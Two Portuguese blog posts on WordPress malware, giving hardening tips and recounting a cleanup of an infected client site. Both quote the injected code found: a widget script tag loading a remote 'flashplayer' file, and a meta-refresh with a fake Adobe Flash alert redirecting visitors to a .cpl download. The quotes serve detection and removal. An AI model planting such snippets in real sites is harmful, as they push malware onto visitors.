Tag: Wordpress

Malware no Wordpress
Blog, Wordpress

Malware no WordPress 2

Ultimamente parece que virou moda, quase todo mundo está com problemas de malware no wordpress. Por que isso está acontecendo?
As variáveis são muitas. Pode ser um plugin, pode ser alguma linha de código no seu theme (ou algum outro theme que tenha na pasta de themes), pode ser falha de segurança do servidor, pode ser que sua senha é muito fácil de descobrir..

Como evitar malware no wordpress?

Malware no WordPressNão posso dizer que isso vai te ajudar 100% a nunca mais ter esse problema, mas aí estão algumas dicas:

  • Desativar no painel do WordPress todos os plugins que não estão sendo usados
  • Deletar do FTP todos os plugins que não estão sendo usados
  • Deletar do FTP todos os themes que não estão sendo usados
  • Alterar a senha do FTP e do painel de controle do WordPress pelo menos uma vez ao mês
  • Deletar arquivos do FTP que não esteja usando para nada, mesmo que sejam apenas imagens
  • Atualizar plugins*
  • Atualizar seu WordPress*
  • Deletar os arquivos Readme.html e Lincence.txt para evitar malware no wordpress.

* Sempre fico com um pé atrás com novas versões do WordPress e de plugins (é muito comum gerar erro na atualização). Geralmente espero pelo menos uma semana depois para atualizar e mesmo assim faço backup geral antes.

Uma outra coisa que recomendo, é remover a função wp_generator que é padrão do WordPress. Essa função gera no código fonte do seu theme a versão do WordPress que está usando. Isso pode tornar você um alvo fácil, principalmente se você não está usando a última versão do WordPress.

Para saber se seu theme está gerando isso no código, veja no código fonte se encontra algo assim:

<meta name="generator" content="WordPress 3.6" />

O número 3.6 é a versão do WordPress que você está usando. Então se estiver usando outra versão, terá outro no lugar.

Para remover o wp_generator, adicione o código abaixo no arquivo functions.php do seu theme:

remove_action('wp_head', 'wp_generator');

Se não remover isso com a linha de código acima, é por que provavelmente foi inserido manualmente. Então abra o arquivo header.php do seu theme, procure pelo código e delete.

Evite usar plugins

Muita gente acha que isso não tem nada a ver. Já li vários artigos sobre o assunto, alguns dizem que é muito mais seguro, outros dizem que não.. uns dizem que pesa muito no banco de dados, outros dizem que não..

Eu evito. Só uso se não tiver escolha. Por que?
Por que não conheço quem fez o plugin, não sei qual a intenção dessa pessoa. Às vezes sem querer ela pode usar algo lá que vai ser um problema enorme daqui uma semana.
Então quando posso, faço do zero, crio o código eu mesma, por que se aparecer problema, eu sei o que fiz e posso tentar resolver (ou desistir.. rs) e obviamente não uso código malicioso nenhum nos meus códigos, tanto que aqui no Difluir e nos outros domínios que já tive, nunca peguei malware no wordpress. E espero continuar assim.

Malware no Wordpres, socorro.

É claro que não são todos os plugins com problema, ou o WordPress já era.
Mas baixe plugins direto do site do WordPress.org e não faça download de outros sites que encontra pelo google. E na dúvida, pesquisa sobre o plugin que quer usar, você sempre vai encontrar pessoas comentando a respeito, se é bom ou não, se teve algum problema.

E se possível não use tantos plugins. Use apenas se você realmente precisa e não sabe fazer de outra forma.
E não use mais de um plugin que faz a mesma coisa. É muito comum eu pegar um job e ter uns 3 ou 4 plugins para a mesma coisa e geralmente estão todos ativados. Entro pânico quando vejo isso.
Esses plugins que fazem a mesma coisa, podem gerar conflito e dar erro, e ou pode deixar seu código sem validação, principalmente aqueles de SEO. Não tem por que você ter 2 plugins para SEO. Um plugin é suficiente.

Mas já tem mensagem de malware no wordpress, como resolver?

A maioria das hospedagens tem opção para recuperar backup ou algo assim. Você pode entrar em contato com o suporte e ver se eles podem colocar o último backup feito, antes da mensagem de malware no wordpress.
Mas de qualquer forma é bom você dá uma organizada nos seus arquivos.

Malware no wordpress.

Pelo que tenho notado, estão usando plugins e themes padrão do WordPress como base para ataques. Então recomendo que dê uma olhada em cada arquivo dos themes e plugins que tem no ftp e ainda olhe os arquivos do WordPress que tem na raiz da instalação. Se você encontrar um código enorme com várias letras e números juntos, é ele mesmo, só deletar, salvar o arquivo e subir novamente para o ftp.

Mas em alguns casos isso não resolve, por que pode ter esse código em outros arquivos do WordPress ou pode ser mesmo falha em algum código que está permitindo a invasão. Então o melhor é verificar apenas o theme que está usando, fazer backup do banco de dados e da pasta de uploads (wp-content/uploads). Depois deletar tudo e instalar novamente do zero.

Se você resolver instalar do zero e manualmente, recomendo que baixe o WordPress direto do wordpress.org, na versão em inglês.
Para evitar baixar um malware no worpress… Um wordpress já batizado. 

Malware no wordpress escondido nos WIDGETS

Reparei também que muitas vezes, o malware no wordpress coloca os cóigos na barra de Widget. Como texto/html

Assim: <script src="http://216.92.7.75/br/flashplayer"></script

Escreva abaixo se conhece outros ou se tem soluções diferentes.

PS: RECOMENDO O PLUGIN  Better WP Security Contra diversos problemas no WordPress inclusive malware no wordpress.

Malware no Wordpress
Blog, Wordpress

Google – Seu site está infectado com Malware

Malware

No Seu wordpress foi modificado?
Está redirecionado para outro site ou pior para um link com um arquivo infectado?

Malware

no WordPress

O google te disparou um alerta e agora, o Google não deixa seus visitante entrarem no seu site… dizendo que está infectado por um Malware? Que cliente voltaria a acessa-lo?Malware no WordPress

O Google detectou que algumas páginas de seu site http://www.seusite.com.br/ podem infectar os computadores dos usuários com software destinado a acessar informações confidenciais (malware) ou até mesmo danificar os computadores.

E mais, que o Google Adwords bloqueou todos os anuncios deste cliente. Obvio por causa do malware.

Tive o disprivilégio de isso acontecer comigo. Em um site de um cliente.
Todos que tentavam acessar o Google colocava um aviso ou no Google Chrome aparecia uma tela vemelha… dizendo vá embora… aqui é perigoso. Este site instala um software que pode danificar seu computador (malware).

O wordpress desse cliente estava intacto, mas quando você acessava o site (mesmo o admin) era redirecionado para o dominio http://www.premiado2013.com.br, no link: http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl .

Cruel pois é um script mal intencionado. Fora a mensagem que dizia que o Flash iria ser atualizado automaticamente. (isso em POP-UP).

'Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado'

 

Analizando o ocorrido, ele alterou alguns arquivos do WordPress: Index.php, wp-activate.php e wp-blog-header.php tudo na rais do WordPress.

Após as analizes para ver o estrago, foi fácil resolver.
Só apagar esta linha

"<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW">
<meta http-equiv="REFRESH" content="2;url=http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl">
<script type="text/javascript">
alert('Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado');
</script>
</script>
</body>"

dos arquivos modificados.

Não sei dizer como isso foi feito.

Estou monitorando e deixo vocês atualizados sobre novas informações.

Abraços.

Link Solicitar Verificação do Google: Clique aqui

E voce já passou por isso? sabe a solução para esse malware?  tem idéia de como ele pode ter alterado meus arquivos? deixe seu comentário.